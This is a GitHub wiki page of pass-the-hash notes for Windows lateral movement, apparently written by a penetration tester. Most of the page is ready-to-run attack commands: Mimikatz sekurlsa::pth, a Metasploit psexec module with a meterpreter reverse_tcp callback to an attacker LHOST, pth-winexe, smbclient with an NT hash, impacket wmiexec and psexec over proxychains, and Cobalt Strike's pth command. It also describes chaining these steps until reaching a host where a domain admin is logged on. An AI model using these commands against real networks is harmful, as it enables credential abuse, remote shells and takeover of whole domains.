Pass the hash - CraigDonkin/Infrastructure GitHub Wiki

Techniques for passing the hash

Overview

  • Pass the hash is a lateral movement technique
  • No need to crack the password
  • Still works, but not as well as it once did
  • You obtain the privileges of the account whose hash you compromised

Attack Paths

  • PTH with non-unique local admin hashes
    • Can be very effective across the server and workstation estate
    • Not a domain account, though
  • PTH > Mimikatz > PTH > Mimikatz
    • Repeat until you are on a host the DA is logged on to, etc.

Mimikatz

privilege::debug
sekurlsa::pth /user:username /domain:domainname /ntlm:ntlmhash

The above command will launch cmd.exe using the hash you passed.

Metasploit

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST Blah
set LPORT 443
set RHOST target
set SMBPass NTLMHASH
exploit

Alternative module (PowerShell-based):

use exploit/windows/smb/psexec_psh

pth-toolkit

https://github.com/byt3bl33d3r/pth-toolkit

pth-winexe -U username%'NTLMHASH' //host cmd.exe

smbclient

smbclient -U domain/user%NTHASH --pw-nt-hash //host/c$

The --pw-nt-hash option tells smbclient to treat the supplied password as an NT hash; the share path uses a slash (//host/c$).

wmiexec.py

  • Part of impacket

python wmiexec.py -hashes LMHASH:NTHASH domain/user@host

psexec

proxychains python ./psexec.py -hashes LMHASH:NTHASH domain/user@host

Cobalt Strike

  • Use the pth command
  • Requires local administrator rights
  • This uses Mimikatz under the hood

pth <domain\user> <NTLM hash>

  • Once run, you can execute commands while impersonating the user you specified.
  • The rev2self command reverts the Beacon to its original token.